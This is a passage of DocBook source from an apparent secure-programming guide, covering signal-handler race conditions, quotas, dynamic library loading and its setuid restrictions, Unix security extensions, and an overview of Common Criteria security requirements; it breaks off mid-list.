||
if it promises to be safe to call inside a signal.
|
||
For more information, see the glibc FAQ (on some systems a local
|
||
copy is available at <filename>/usr/doc/glibc-*/FAQ</filename>).
|
||
</para>
|
||
|
||
<para>
|
||
For new programs, just use the POSIX signal system
|
||
(which in turn was based on BSD work); this set is widely supported
|
||
and doesn't have some of the problems
|
||
that some of the older signal systems did.
|
||
The POSIX signal system is based on using the sigset_t datatype,
|
||
which can
|
||
be manipulated through a set of operations: sigemptyset(),
|
||
sigfillset(), sigaddset(), sigdelset(), and sigismember().
|
||
You can read about these in sigsetops(3).
|
||
Then use sigaction(2), sigprocmask(2),
|
||
sigpending(2), and sigsuspend(2) to set up an manipulate signal handling
|
||
(see their man pages for more information).
|
||
</para>
|
||
|
||
<para>
|
||
In general, make any signal handlers very short and simple, and
|
||
look carefully for race conditions.
|
||
Signals, since they are by nature asynchronous,
|
||
can easily cause race conditions.
|
||
</para>
|
||
|
||
<para>
|
||
A common convention exists for servers: if you receive SIGHUP, you should
|
||
close any log files, reopen and reread configuration files, and then
|
||
re-open the log files.
|
||
This supports reconfiguration without halting the server and
|
||
log rotation without data loss.
|
||
If you are writing a server where this convention makes sense,
|
||
please support it.
|
||
</para>
|
||
|
||
<para>
|
||
Michal Zalewski [2001] has written an excellent tutorial on how
|
||
signal handlers are exploited, and has recommendations for how to
|
||
eliminate signal race problems.
|
||
I encourage looking at his summary for more information; here are
|
||
my recommendations, which are similar to Michal's work:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Where possible, have your signal handlers unconditionally set a specific flag
|
||
and do nothing else.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
If you must have more complex signal handlers,
|
||
use only calls specifically designated as being safe for use
|
||
in signal handlers.
|
||
In particular,
|
||
don't use malloc() or free() in C (which on most systems
|
||
aren't protected against signals), nor the many functions that depend on them
|
||
(such as the printf() family and syslog()).
|
||
You could try to ``wrap'' calls to insecure library calls with a check
|
||
to a global flag (to avoid re-entry), but I wouldn't recommend it.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Block signal delivery during all non-atomic operations in the program, and
|
||
block signal delivery inside signal handlers.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="quotas">
|
||
<title>Quotas and Limits</title>
|
||
|
||
<para>
|
||
Many Unix-like systems have
|
||
mechanisms to support filesystem quotas and process resource limits.
|
||
This certainly includes Linux.
|
||
These mechanisms are particularly useful for preventing denial of service
|
||
attacks; by limiting the resources available to each user, you can make
|
||
it hard for a single user to use up all the system resources.
|
||
Be careful with terminology here, because both filesystem quotas
|
||
and process resource limits have ``hard'' and
|
||
``soft'' limits but the terms mean slightly different things.
|
||
</para>
|
||
|
||
<para>
|
||
You can define storage (filesystem) quota limits on each mountpoint
|
||
for the number of blocks of storage and/or the number of unique files
|
||
(inodes) that can be used, and you can set such limits for a given user
|
||
or a given group.
|
||
A ``hard'' quota limit is a never-to-exceed limit, while a
|
||
``soft'' quota can be temporarily exceeded.
|
||
See quota(1), quotactl(2), and quotaon(8).
|
||
</para>
|
||
|
||
<para>
|
||
The rlimit mechanism supports a large number of process quotas, such as
|
||
file size, number of child processes, number of open files, and so on.
|
||
There is a ``soft'' limit (also called the current limit) and a
|
||
``hard limit'' (also called the upper limit).
|
||
The soft limit cannot be exceeded at any time, but through calls it can
|
||
be raised up to the value of the hard limit.
|
||
See getrlimit(2), setrlimit(2), and getrusage(2), sysconf(3), and
|
||
ulimit(1).
|
||
Note that there are several ways to set these limits, including the
|
||
PAM module pam_limits.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="dlls">
|
||
<title>Dynamically Linked Libraries</title>
|
||
|
||
<para>
|
||
Practically all programs depend on libraries to execute.
|
||
In most modern Unix-like systems, including Linux,
|
||
programs are by default compiled to use <emphasis remap="it">dynamically linked libraries</emphasis>
|
||
(DLLs).
|
||
That way, you can update a library and all the programs using that library
|
||
will use the new (hopefully improved) version if they can.
|
||
</para>
|
||
|
||
<para>
|
||
Dynamically linked libraries are typically placed in one a few special
|
||
directories. The usual directories include
|
||
<filename>/lib</filename>, <filename>/usr/lib</filename>, <filename>/lib/security</filename>
|
||
for PAM modules,
|
||
<filename>/usr/X11R6/lib</filename> for X-windows, and <filename>/usr/local/lib</filename>.
|
||
You should use these standard conventions in your programs, in particular,
|
||
except during debugging you shouldn't use value computed from the
|
||
current directory as a source for dynamically linked libraries (an
|
||
attacker may be able to add their own choice ``library'' values).
|
||
</para>
|
||
|
||
<para>
|
||
There are special conventions for naming libraries and having symbolic
|
||
links for them, with the result that you can update libraries and still
|
||
support programs that want to use old, non-backward-compatible versions
|
||
of those libraries.
|
||
There are also ways to override specific libraries or even just
|
||
specific functions in a library when executing a particular program.
|
||
This is a real advantage of Unix-like systems over
|
||
Windows-like systems; I believe Unix-like systems have a much better system
|
||
for handling library updates, one reason that Unix and Linux systems are reputed
|
||
to be more stable than Windows-based systems.
|
||
</para>
|
||
|
||
<para>
|
||
On GNU glibc-based systems, including all Linux systems,
|
||
the list of directories automatically searched during program start-up is
|
||
stored in the file /etc/ld.so.conf.
|
||
Many Red Hat-derived distributions don't normally
|
||
include <filename>/usr/local/lib</filename>
|
||
in the file <filename>/etc/ld.so.conf</filename>.
|
||
I consider this a bug, and adding <filename>/usr/local/lib</filename> to
|
||
<filename>/etc/ld.so.conf</filename>
|
||
is a common ``fix'' required to run many programs on Red Hat-derived systems.
|
||
If you want to just override a few functions in a library, but keep the
|
||
rest of the library, you can enter the names of overriding libraries
|
||
(.o files) in <filename>/etc/ld.so.preload</filename>;
|
||
these ``preloading'' libraries will take precedence over the standard set.
|
||
This preloading file is typically used for emergency patches;
|
||
a distribution usually won't include such a file when delivered.
|
||
Searching all of these directories at program start-up would be too
|
||
time-consuming, so a caching arrangement is actually used.
|
||
The program ldconfig(8) by default reads in the file /etc/ld.so.conf,
|
||
sets up the appropriate symbolic links in the dynamic link directories
|
||
(so they'll follow the standard conventions),
|
||
and then writes a cache to /etc/ld.so.cache that's then used by other
|
||
programs.
|
||
So, ldconfig has to be run whenever a DLL is added, when a DLL is removed,
|
||
or when the set of DLL directories changes; running ldconfig is often
|
||
one of the steps performed by package managers
|
||
when installing a library.
|
||
On start-up, then, a program uses the dynamic loader to
|
||
read the file /etc/ld.so.cache and then load the libraries it needs.
|
||
</para>
|
||
|
||
<para>
|
||
Various environment variables can control this process, and in fact
|
||
there are environment variables that permit you to
|
||
override this process (so, for example, you can temporarily
|
||
substitute a different library for this particular execution).
|
||
In Linux,
|
||
the environment variable
|
||
LD_LIBRARY_PATH is a colon-separated set of directories where libraries
|
||
are searched for first, before the standard set of directories;
|
||
this is useful when debugging a new library or using a nonstandard
|
||
library for special purposes, but be sure you trust those who can
|
||
control those directories.
|
||
The variable LD_PRELOAD lists object files with functions that override
|
||
the standard set, just as /etc/ld.so.preload does.
|
||
The variable LD_DEBUG, displays debugging information; if set
|
||
to ``all'', voluminous information about the dynamic linking process
|
||
is displayed while it's occurring.
|
||
</para>
|
||
|
||
<para>
|
||
Permitting user control over dynamically linked libraries
|
||
would be disastrous for setuid/setgid programs if special measures
|
||
weren't taken.
|
||
Therefore, in the GNU glibc implementation, if the program is setuid or setgid
|
||
these variables (and other similar variables) are ignored or greatly
|
||
limited in what they can do.
|
||
The GNU glibc library determines if a program is setuid or setgid
|
||
by checking the program's credentials;
|
||
if the UID and EUID differ, or the GID and the EGID differ, the
|
||
library presumes the program is setuid/setgid (or descended from one)
|
||
and therefore greatly limits its abilities to control linking.
|
||
If you load the GNU glibc libraries, you can see this; see especially
|
||
the files elf/rtld.c and sysdeps/generic/dl-sysdep.c.
|
||
This means that if you cause the UID and GID to equal the EUID and EGID,
|
||
and then call a program, these variables will have full effect.
|
||
Other Unix-like systems handle the situation differently but for the
|
||
same reason: a setuid/setgid program should not be unduly affected
|
||
by the environment variables set.
|
||
Note that graphical user interface toolkits generally do permit
|
||
user control over dynamically linked libraries, because
|
||
executables that directly invoke graphical user inteface toolkits
|
||
should never, ever, be setuid (or have other special privileges) at all.
|
||
For more about how to develop secure GUI applications, see
|
||
<xref linkend="minimize-privileged-modules">.
|
||
</para>
|
||
|
||
<para>
|
||
For Linux systems, you can get more information from my document, the
|
||
<ulink url="http://www.dwheeler.com/program-library"><emphasis>Program Library HOWTO</emphasis></ulink>.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="audit">
|
||
<title>Audit</title>
|
||
|
||
<para>
|
||
Different Unix-like systems handle auditing differently.
|
||
In Linux, the most common ``audit'' mechanism is syslogd(8), usually working
|
||
in conjunction with klogd(8).
|
||
You might also want to look at wtmp(5), utmp(5), lastlog(8), and acct(2).
|
||
Some server programs (such as the Apache web server)
|
||
also have their own audit trail mechanisms.
|
||
According to the FHS, audit logs should be stored in /var/log or its
|
||
subdirectories.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="pam">
|
||
<title>PAM</title>
|
||
|
||
<para>
|
||
Sun Solaris and nearly all Linux systems use the
|
||
Pluggable Authentication Modules (PAM) system for authentication.
|
||
PAM permits run-time configuration of authentication methods
|
||
(e.g., use of passwords, smart cards, etc.).
|
||
See <xref linkend="use-pam"> for more information on using PAM.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="unix-extensions">
|
||
<title>Specialized Security Extensions for Unix-like Systems</title>
|
||
|
||
<para>
|
||
A vast amount of research and development has gone into
|
||
extending Unix-like systems to support security needs of various
|
||
communities.
|
||
For example, several Unix-like systems have been extended to support the
|
||
U.S. military's desire for multilevel security.
|
||
If you're developing software, you should try to design your software
|
||
so that it can work within these extensions.
|
||
</para>
|
||
|
||
<para>
|
||
FreeBSD has a new system call,
|
||
<ulink url="http://docs.freebsd.org/44doc/papers/jail/jail.html">jail(2)</ulink>.
|
||
The jail system call supports sub-partitioning an environment
|
||
into many virtual machines (in a sense, a ``super-chroot'');
|
||
its most popular use has been to provide
|
||
virtual machine services for Internet Service Provider environments.
|
||
Inside a jail, all processes (even those owned by root)
|
||
have the scope of their requests limited to the jail.
|
||
When a FreeBSD system is booted up after a fresh install,
|
||
no processes will be in jail.
|
||
When a process is placed in a jail, it, and any descendants of
|
||
that process created will be in that jail.
|
||
Once in a jail,
|
||
access to the file name-space is restricted in the style of chroot(2)
|
||
(with typical chroot escape routes blocked),
|
||
the ability to bind network resources is limited to a specific IP address,
|
||
the ability to manipulate system resources and perform privileged operations
|
||
is sharply curtailed, and the ability to interact with other processes
|
||
is limited to only processes inside the same jail.
|
||
Note that each jail is bound to a single IP address;
|
||
processes within the jail may not make use of any other IP
|
||
address for outgoing or incoming connections.
|
||
</para>
|
||
|
||
<para>
|
||
Some extensions available in Linux, such as POSIX capabilities and
|
||
special mount-time options, have already been discussed.
|
||
Here are a few of these efforts for Linux systems for creating
|
||
restricted execution environments; there are many different approaches.
|
||
The U.S. National Security Agency (NSA) has developed
|
||
<ulink url="http://www.nsa.gov/selinux">Security-Enhanced Linux (Flask)</ulink>,
|
||
which supports defining a security policy in a specialized language
|
||
and then enforces that policy.
|
||
The <ulink url="http://medusa.fornax.sk">Medusa DS9</ulink>
|
||
extends Linux by supporting, at the kernel level,
|
||
a user-space authorization server.
|
||
<ulink url="http://www.lids.org">LIDS</ulink>
|
||
protects files and processes, allowing administrators to
|
||
``lock down'' their system.
|
||
The ``Rule Set Based Access Control'' system,
|
||
<ulink url="http://www.rsbac.de">RSBAC</ulink>
|
||
is based on the Generalized Framework for Access Control (GFAC)
|
||
by Abrams and LaPadula and provides a flexible system of access
|
||
control based on several kernel modules.
|
||
<ulink url="http://subterfugue.org">Subterfugue</ulink>
|
||
is a framework for ``observing and playing with the reality of software'';
|
||
it can intercept system calls and change their parameters
|
||
and/or change their return values to implement sandboxes, tracers,
|
||
and so on;
|
||
it runs under Linux 2.4 with no changes (it doesn't require
|
||
any kernel modifications).
|
||
<ulink url="http://www.cs.berkeley.edu/~daw/janus">Janus</ulink>
|
||
is a security tool for sandboxing untrusted applications
|
||
within a restricted execution environment.
|
||
Some have even used
|
||
<ulink url="http://user-mode-linux.sourceforge.net">User-mode Linux</ulink>,
|
||
which implements ``Linux on Linux'', as a sandbox implementation.
|
||
Because there are so many different approaches to implementing more
|
||
sophisticated security models, Linus Torvalds has requested that a
|
||
generic approach be developed so different security policies can be
|
||
inserted; for more information about this, see
|
||
<ulink url="http://mail.wirex.com/mailman/listinfo/linux-security-module">
|
||
http://mail.wirex.com/mailman/listinfo/linux-security-module</ulink>.
|
||
</para>
|
||
<para>
|
||
There are many other extensions for security on various Unix-like systems,
|
||
but these are really outside the scope of this document.
|
||
</para>
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
|
||
<chapter id="requirements">
|
||
<title>Security Requirements</title>
|
||
|
||
<epigraph>
|
||
<attribution>Job 5:24 (NIV)</attribution>
|
||
<para>
|
||
You will know that your tent is secure;
|
||
you will take stock of your property and find nothing missing.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
Before you can determine if a program is secure, you need to determine
|
||
exactly what its security requirements are.
|
||
Thankfully, there's an international standard for identifying and defining
|
||
security requirements that is useful for many such circumstances:
|
||
the Common Criteria [CC 1999], standardized as ISO/IEC 15408:1999.
|
||
The CC is the culmination of decades of work to identify
|
||
information technology security requirements.
|
||
There are other schemes for defining security requirements and evaluating
|
||
products to see if products meet the requirements,
|
||
such as NIST FIPS-140 for cryptographic equipment,
|
||
but these other schemes are generally focused on a
|
||
specialized area and won't be considered further here.
|
||
</para>
|
||
|
||
<para>
|
||
This chapter briefly describes the Common Criteria (CC) and how to use its
|
||
concepts to help you informally identify security requirements and
|
||
talk with others about security requirements using standard terminology.
|
||
The language of the CC is more precise, but it's also more formal and
|
||
harder to understand; hopefully the text in this section will help you
|
||
"get the jist".
|
||
</para>
|
||
|
||
<para>
|
||
Note that, in some circumstances, software cannot be used unless it
|
||
has undergone a CC evaluation by an accredited laboratory.
|
||
This includes certain kinds of uses in the U.S. Department of Defense
|
||
(as specified by NSTISSP Number 11, which requires that before some
|
||
products can be used they must be evaluated or enter evaluation),
|
||
and in the future such a requirement may
|
||
also include some kinds of uses for software in the U.S. federal government.
|
||
This section doesn't provide enough information
|
||
if you plan to actually go through a CC evaluation by an
|
||
accredited laboratory.
|
||
If you plan to go through a formal evaluation,
|
||
you need to read the real CC, examine various websites to really understand
|
||
the basics of the CC, and
|
||
eventually contract a lab accredited to do a CC evaluation.
|
||
</para>
|
||
|
||
<sect1>
|
||
<title>Common Criteria Introduction</title>
|
||
|
||
<para>
|
||
First, some general information about the CC will help understand
|
||
how to apply its concepts.
|
||
The CC's official name is
|
||
"The Common Criteria for Information Technology Security Evaluation",
|
||
though it's normally just called the Common Criteria.
|
||
The CC document has three parts:
|
||
the introduction (that describes the CC overall),
|
||
security functional requirements (that lists various kinds of security
|
||
functions that products might want to include),
|
||
and security assurance requirements (that lists various methods of
|
||
assuring that a product is secure).
|
||
There is also a related document, the
|
||
"Common Evaluation Methodology" (CEM),
|
||
that guides evaluators how to apply the CC when doing formal evaluations
|
||
(in particular, it amplifies what the CC means in certain cases).
|
||
</para>
|
||
|
||
<para>
|
||
Although the CC is International Standard ISO/IEC 15408:1999,
|
||
it is outrageously expensive to order the CC from ISO.
|
||
Hopefully someday ISO will follow the lead of other standards
|
||
organizations such as the IETF and the W3C, which freely redistribute
|
||
standards.
|
||
Not surprisingly, IETF and W3C standards are followed more often than
|
||
many ISO standards, in part because ISO's fees for standards simply
|
||
make them inaccessible to most developers.
|
||
(I don't mind authors being paid for their work, but ISO doesn't
|
||
fund most of the standards development work - indeed, many of the developers
|
||
of ISO documents are volunteers - so ISO's indefensible fees only line their
|
||
own pockets and don't actually aid the authors or users at all.)
|
||
Thankfully, the CC developers anticipated this problem and have made sure
|
||
that the CC's technical content is freely available to all;
|
||
you can download the CC's technical content from
|
||
<ulink
|
||
url="http://csrc.nist.gov/cc/ccv20/ccv2list.htm">http://csrc.nist.gov/cc/ccv20/ccv2list.htm</ulink>
|
||
Even those doing formal evaluation processes usually
|
||
use these editions of the CC, and not the ISO versions;
|
||
there's simply no good reason to pay ISO for them.
|
||
</para>
|
||
|
||
<para>
|
||
Although it can be used in other ways, the CC is typically
|
||
used to create two kinds of documents, a
|
||
``Protection Profile'' (PP) or a ``Security Target'' (ST).
|
||
A ``protection profile'' (PP) is a document created by group of users
|
||
(for example, a consumer group or large organization)
|
||
that identifies the desired security properties of a product.
|
||
Basically, a PP is a list of user security requirements,
|
||
described in a very specific way defined by the CC.
|
||
If you're building a product similar to other existing products, it's
|
||
quite possible that there are one or more PPs that define what some
|
||
users believe are necessary for that kind of product
|
||
(e.g., an operating system or firewall).
|
||
A ``security target'' (ST) is a document that identifies what a product
|
||
actually does, or a subset of it, that is security-relevant.
|
||
An ST doesn't need to meet the requirements of
|
||
any particular PP, but an ST could meet the requirements of one or more PPs.
|
||
</para>
|
||
|
||
<para>
|
||
Both PPs and STs can go through a formal evaluation.
|
||
An evaluation of a PP simply ensures that the PP meets various documentation
|
||
rules and sanity checks.
|
||
An ST evaluation involves not just examining the ST document,
|
||
but more importantly it involves evaluating an actual system
|
||
(called the ``target of evaluation'', or TOE).
|
||
The purpose of an ST evaluation is to ensure that, to the level of
|
||
the assurance requirements specified by the ST,
|
||
the actual product (the TOE) meets the ST's security functional requirements.
|
||
Customers can then compare evaluated STs to
|
||
PPs describing what they want.
|
||
Through this comparison, consumers can determine if the
|
||
products meet their requirements - and if not, where the limitations are.
|
||
</para>
|
||
|
||
<para>
|
||
To create a PP or ST, you go through a process of identifying the
|
||
security environment, namely, your
|
||
assumptions, threats, and relevant organizational
|
||
security policies (if any).
|
||
From the security environment, you derive
|
||
the security objectives for the product or product type.
|
||
Finally, the security requirements are selected so that
|
||
they meet the objectives.
|
||
There are two kinds of security requirements: functional requirements
|
||
(what a product has to be able to do), and assurance requirements
|
||
(measures to inspire confidence that the objectives have been met).
|
||
Actually creating a PP or ST is often not a simple straight line as
|
||
outlined here, but the final result needs to show a clear relationship so
|
||
that no critical point is easily overlooked.
|
||
Even if you don't plan to write an ST or PP,
|
||
the ideas in the CC can still be helpful;
|
||
the process of identifying the security environment, objectives, and
|
||
requirements is still helpful in identifying what's really important.
|
||
</para>
|
||
|
||
<para>
|
||
The vast majority of the CC's text is used to define standardized
|
||
functional requirements and assurance requirements.
|
||
In essence, the majority of the CC is a ``chinese menu'' of possible
|
||
security requirements that someone might want.
|
||
PP authors pick from the various options to describe what they want, and
|
||
ST authors pick from the options to describe what they provide.
|
||
</para>
|
||
|
||
<para>
|
||
Since many people might have difficulty identifying a reasonable set
|
||
of assurance requirements, so pre-created sets of assurance requirements
|
||
called ``evaluation assurance levels'' (EALs) have been defined, ranging
|
||
from 1 to 7.
|
||
EAL 2 is simply a standard shorthand for the set of assurance requirements
|
||
defined for EAL 2.
|
||
Products can add additional assurance measures, for example, they might
|
||
choose EAL 2 plus some additional assurance measures (if the combination
|
||
isn't enough to achieve a higher EAL level, such a combination would be
|
||
called "EAL 2 plus").
|
||
There are mutual recognition agreements signed between many of the
|
||
world's nations that will accept an evaluation done by
|
||
an accredited laboratory in the other countries as long as all of the
|
||
assurance measures taken were at the EAL 4 level or less.
|
||
</para>
|
||
|
||
<para>
|
||
If you want to actually write an ST or PP, there's an
|
||
open source software program that can help you, called the
|
||
``CC Toolbox''.
|
||
It can make sure that dependencies between requirements
|
||
are met, suggest common requirements, and help you quickly
|
||
develop a document, but it obviously can't do your thinking for you.
|
||
The specification of exactly what information
|
||
must be in a PP or ST are in CC part 1, annexes B and C respectively.
|
||
</para>
|
||
|
||
<para>
|
||
If you do decide to have your product (or PP) evaluated by
|
||
an accredited laboratory, be prepared to spend money, spend time,
|
||
and work throughout the process.
|
||
In particular, evaluations require paying an
|
||
accredited lab to do the evaluation, and higher levels of assurance
|
||
become rapidly more expensive.
|
||
Simply believing your product is secure isn't good enough; evaluators
|
||
will require evidence to justify any claims made.
|
||
Thus, evaluations require documentation, and usually the available
|
||
documentation has to be improved or developed
|
||
to meet CC requirements (especially at the higher assurance levels).
|
||
Every claim has to be justified to some level of confidence, so the more
|
||
claims made, the stronger the claims, and the
|
||
more complicated the design, the more expensive an evaluation is.
|
||
Obviously, when flaws are found, they will usually need to be fixed.
|
||
Note that a laboratory is paid to evaluate a product and determine the truth.
|
||
If the product doesn't meet its claims, then you basically have two
|
||
choices: fix the product, or change (reduce) the claims.
|
||
</para>
|
||
|
||
<para>
|
||
It's important to discuss with customers what's desired before beginning
|
||
a formal ST evaluation;
|
||
an ST that includes functional or assurance requirements
|
||
not truly needed by customers will
|
||
be unnecessarily expensive to evaluate, and an ST that omits
|
||
necessary requirements may not be acceptable to the customers
|
||
(because that necessary piece won't have been evaluated).
|
||
PPs identify such requirements, but make sure that the PP
|
||
accurately reflects the customer's real requirements (perhaps the customer
|
||
only wants a part of the functionality or assurance in the PP,
|
||
or has a different environment in mind, or wants something else instead
|
||
for the situations where your product will be used).
|
||
Note that an ST need not include every security feature in a product;
|
||
an ST only states what will be (or has been) evaluated.
|
||
A product that has a higher EAL rating is not necessarily more secure than a
|
||
similar product with a lower rating or no rating;
|
||
the environment might be different, the evaluation may have saved money and
|
||
time by not evaluating the other product at a higher level,
|
||
or perhaps the evaluation missed something important.
|
||
Evaluations are not proofs; they simply impose a defined minimum bar to
|
||
gain confidence in the requirements or product.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1>
|
||
<title>Security Environment and Objectives</title>
|
||
|
||
<para>
|
||
The first step in defining a PP or ST is identify the
|
||
``security environment''.
|
||
This means that you have to consider the physical environment
|
||
(can attackers access the computer hardware?),
|
||
the assets requiring protection (files, databases, authorization
|
||
credentials, and so on),
|
||
and the purpose of the TOE (what kind of product is it? what is
|
||
the intended use?).
|
||
</para>
|
||
|
||
<para>
|
||
In developing a PP or ST, you'd end up with a statement of
|
||
assumptions (who is trusted? is the network or platform benign?),
|
||
threats (that the system or its environment must counter),
|
||
and organizational security policies (that the system or its environment
|
||
must meet).
|
||
A threat is characterized in terms of a threat agent
|
||
(who might perform the attack?), a presumed attack method,
|
||
any vulnerabilities that are the basis for the attack, and what asset
|
||
is under attack.
|
||
</para>
|
||
|
||
<para>
|
||
You'd then define a set of security objectives for the system
|
||
and environment, and show that those objectives counter the threats
|
||
and satisfy the policies.
|
||
Even if you aren't creating a PP or ST, thinking about your assumptions,
|
||
threats, and possible policies can help you avoid foolish decisions.
|
||
For example, if the computer network you're using can be sniffed
|
||
(e.g., the Internet), then unencrypted passwords are a foolish idea
|
||
in most circumstances.
|
||
</para>
|
||
|
||
<para>
|
||
For the CC, you'd then identify the functional and assurance requirements
|
||
that would be met by the TOE, and which ones would be met by the environment,
|
||
to meet those security objectives.
|
||
These requirements would be selected from the ``chinese menu'' of the CC's
|
||
possible requirements, and the next sections will briefly describe
|
||
the major classes of requirements.
|
||
In the CC, requirements are grouped into classes, which are subdivided into
|
||
families, which are further subdivided into components; the details of all this
|
||
are in the CC itself if you need to know about this.
|
||
A good diagram showing how this works is in the CC part 1, figure 4.5,
|
||
which I cannot reproduce here.
|
||
</para>
|
||
|
||
<para>
|
||
Again, if you're not intending for your product to undergo a CC evaluation,
|
||
it's still good to briefly determine this kind of information and informally
|
||
write include that information
|
||
in your documentation (e.g., the man page or whatever your documentation is).
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1>
|
||
<title>Security Functionality Requirements</title>
|
||
<para>
|
||
This section briefly describes the CC security functionality requirements
|
||
(by CC class),
|
||
primarily to give you an idea of the kinds of security requirements
|
||
you might want in your software.
|
||
If you want more detail about the CC's requirements, see CC part 2.
|
||
Here are the major classes of CC security requirements, along with
|
||
the 3-letter CC abbreviation for that class:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Security Audit (FAU).
|
||
Perhaps you'll need to recognize, record, store, and analyze
|
||
security-relevant activities.
|
||
You'll need to identify what you want to make auditable, since
|
||
often you can't leave all possible auditing capabilities enabled.
|
||
Also, consider what to do when there's no room left for auditing -
|
||
if you stop the system, an attacker may intentionally do things to be logged
|
||
and thus stop the system.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Communication/Non-repudiation (FCO).
|
||
This class is poorly named in the CC; officially it's called
|
||
communication, but the real meaning is non-repudiation.
|
||
Is it important that an originator cannot deny having sent a message, or
|
||
that a recipient cannot deny having received it?
|
||
There are limits to how well technology itself can support
|
||
non-repudiation (e.g., a user might be able to give their private key away
|
||
ahead of time if they wanted to be able to repudiate something later),
|
||
but nevertheless for some applications supporting non-repudiation
|
||
capabilities is very useful.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Cryptographic Support (FCS).
|
||
If you're using cryptography, what operations use cryptography,
|
||
what algorithms and key sizes are you using, and how are you managing
|
||
their keys (including distribution and destruction)?
|
||
</para></listitem>
|
||
<listitem><para>
|
||
User Data Protection (FDP).
|
||
This class specifies requirement for protecting user data, and is a big
|
||
class in the CC with many families inside it.
|
||
The basic idea is that you should specify a policy for data
|
||
(access control or information flow rules),
|
||
develop various means to implement the policy,
|
||
possibly support off-line storage, import, and export, and
|
||
provide integrity when transferring user data between TOEs.
|
||
One often-forgotten issue is residual information protection - is it
|
||
acceptable if an attacker can later recover ``deleted'' data?
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Identification and authentication (FIA).
|
||
Generally you don't just want a user to report who they are
|
||
(identification) - you need to verify their identity, a process
|
||
called authentication.
|
||
Passwords are the most common mechanism for authentication.
|
||
It's often useful to limit the number of authentication attempts
|
||
(if you can) and limit the feedback during authentication
|
||
(e.g., displaying asterisks instead of the actual password).
|
||
Certainly, limit what a user can do before authenticating; in many cases,
|
||
don't let the user do anything without authenticating.
|
||
There may be many issues controlling when a session can start, but in the CC
|
||
world this is handled by the "TOE access" (FTA) class described below instead.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Security Management (FMT).
|
||
Many systems will require some sort of management (e.g., to
|
||
control who can do what), generally by those who are given a more
|
||
trusted role (e.g., administrator).
|
||
Be sure you think through what those special operations are, and ensure that
|
||
only those with the trusted roles can invoke them.
|
||
You want to limit trust; ideally, even more trusted roles should be limited
|
||
in what they can do.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Privacy (FPR).
|
||
Do you need to support anonymity, pseudonymity, unlinkability,
|
||
or unobservability?
|
||
If so, are there conditions where you want or don't want these
|
||
(e.g., should an administrator be able to determine the real identity
|
||
of someone hiding behind a pseudonym?).
|
||
Note that these can seriously conflict with
|
||
non-repudiation, if you want those too.
|
||
If you're worried about sophisticated threats, these functions
|
||
can be hard to provide.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Protection of the TOE Security Functions/Self-protection (FPT).
|
||
Clearly, if the TOE can be subverted, any security functions it provides
|
||
aren't worthwhile, and in many cases a TOE has to provide at least some
|
||
self-protection.
|
||
Perhaps you should "test the underlying abstract machine" - i.e., test
|
||
that the underlying components meet your assumptions,
|
||
or have the product run self-tests
|
||
(say during start-up, periodically, or on request).
|
||
You should probably "fail secure", at least under certain conditions;
|
||
determine what those conditions are.
|
||
Consider phyical protection of the TOE.
|
||
You may want some sort of secure recovery function after a failure.
|
||
It's often useful to have replay detection (detect when an attacker is
|
||
trying to replay older actions) and counter it.
|
||
Usually a TOE must make sure that any access checks are
|
||
always invoked and actually succeed before performing a restricted action.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Resource Utilization (FRU).
|
||
Perhaps you need to provide fault tolerance,
|
||
a priority of service scheme, or support
|
||
resource allocation (such as a quota system).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
TOE Access (FTA).
|
||
There may be many issues controlling sessions.
|
||
Perhaps there should be a limit on the number of concurrent sessions
|
||
(if you're running a web service, would it make sense for the same user
|
||
to be logged in simultaneously, or from two different machines?).
|
||
Perhaps you should lock or terminate a session automatically
|
||
(e.g., after a timeout), or let users initiate a session lock.
|
||
You might want to include a standard warning banner.
|
||
One surprisingly useful piece of information is displaying, on login,
|
||
information about the last session (e.g., the date/time and location of the
|
||
last login) and the date/time of the
|
||
last unsuccessful attempt - this gives users information
|
||
that can help them detect interlopers.
|
||
Perhaps sessions can only be established based on other criteria
|
||
(e.g., perhaps you can only use the program during business hours).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Trusted path/channels (FTP).
|
||
A common trick used by attackers is to make the screen appear to be
|
||
something it isn't, e.g., run an ordinary program that looks like a
|
||
login screen or a forged web site.
|
||
Thus, perhaps there needs to be a "trusted path" - a way that users
|
||
can ensure that they are talking to the "real" program.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
|
||
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1>
|
||
<title>Security Assurance Measure Requirements</title>
|
||
<para>
|
||
As noted above, the CC has a set of possible assurance requirements that
|
||
can be selected, and several predefined sets of assurance requirements
|
||
(EAL levels 1 through 7).
|
||
Again, if you're actually going to go through a CC evaluation, you
|
||
should examine the CC documents; I'll skip describing the measures
|
||
involving reviewing official CC documents (evaluating PPs and STs).
|
||
Here are some assurance measures that can increase the confidence
|
||
others have in your software:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Configuration management (ACM).
|
||
At least, have unique a version identifier for each TOE release, so that
|
||
users will know what they have.
|
||
You gain more assurance if you have good automated tools to control
|
||
your software, and have separate version identifiers for each piece
|
||
(typical CM tools like CVS can do this, although CVS doesn't record
|
||
changes as atomic changes which is a weakness of it).
|
||
The more that's under configuration management, the better;
|
||
don't just control your code, but also control documentation,
|
||
track all problem reports (especially security-related ones),
|
||
and all development tools.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Delivery and operation (ADO).
|
||
